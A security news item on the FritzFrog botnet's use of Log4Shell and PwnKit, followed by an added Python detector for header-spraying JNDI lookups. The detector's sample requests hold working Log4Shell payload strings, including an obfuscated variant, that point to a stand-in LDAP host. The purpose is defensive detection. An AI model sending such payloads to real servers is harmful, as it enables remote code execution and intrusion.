FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities
The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell and PwnKit vulnerabilities for lateral movement and privilege escalation.
The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer botnet powered by malware written in Golang.
"FritzFrog identifies potential Log4Shell targets by looking for HTTP servers over ports 8080, 8090, 8888 and 9000. To trigger the vulnerability, an attacker needs to force the vulnerable log4j application to log data containing a payload," security researcher Ori David explained.
"FritzFrog sends the Log4Shell payload in numerous HTTP headers, hoping that at least one of them gets logged by the application. This brute force exploitation approach aims to be a generic Log4Shell exploit that can affect a wide variety of applications."
Finally, FritzFrog manages to evade detection by making sure not to drop files on the disk whenever possible.
The researchers have provided a detection script enterprise defenders can use to check their SSH servers for indicators of a FritzFrog infection.
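The header-spraying behaviour quoted above can also be looked for on the HTTP side. The following is an added example, not the researchers' SSH detection script and not code from the article: it labels a request by how many of its headers carry a JNDI lookup, and goes beyond the article by also catching URL-encoded and nested-lookup forms. The spray threshold, the header names and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import unquote

FRITZFROG_PORTS = {8080, 8090, 8888, 9000}  # ports named in the article
SPRAY_THRESHOLD = 3  # assumption: this many tainted headers counts as a spray

# Nested lookups that can hide the keyword, e.g. ${lower:j} or ${::-j}.
_NESTED = re.compile(r"\$\{(?:(?:lower|upper):|[^{}]*?:-)([^{}]*)\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def has_jndi(value):
    """True if value holds a JNDI lookup, plain, URL-encoded or nested."""
    prev = None
    while prev != value:
        if _JNDI.search(value):
            return True
        prev = value
        value = _NESTED.sub(r"\1", unquote(value))
    return False


def classify(dst_port, headers):
    """Label one request by how many of its headers carry a lookup."""
    hits = sorted(name for name, val in headers.items() if has_jndi(val))
    if len(hits) >= SPRAY_THRESHOLD:
        verdict = "header-spray"
    elif hits:
        verdict = "single-header"
    else:
        verdict = "clean"
    return {"verdict": verdict, "headers": hits,
            "fritzfrog_port": dst_port in FRITZFROG_PORTS}


# Constructed sample requests (192.0.2.1 is a documentation address).
LOOKUP = "${jndi:ldap://192.0.2.1/a}"
SAMPLES = [
    (8080, {"User-Agent": LOOKUP, "Referer": LOOKUP, "X-Api-Version": LOOKUP,
            "Accept": "*/*"}),
    (443, {"User-Agent": "${${lower:j}ndi:ldap://192.0.2.1/a}", "Accept": "*/*"}),
    (9000, {"User-Agent": "curl/8.5.0", "Accept": "*/*"}),
]

if __name__ == "__main__":
    for port, hdrs in SAMPLES:
        print(port, classify(port, hdrs))
```

A "header-spray" verdict on one of the listed ports matches the behaviour described in the quote; a "single-header" hit is still a Log4Shell attempt, but not this particular pattern.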
News URL
https://www.helpnetsecurity.com/2024/02/01/botnet-log4shell-pwnkit/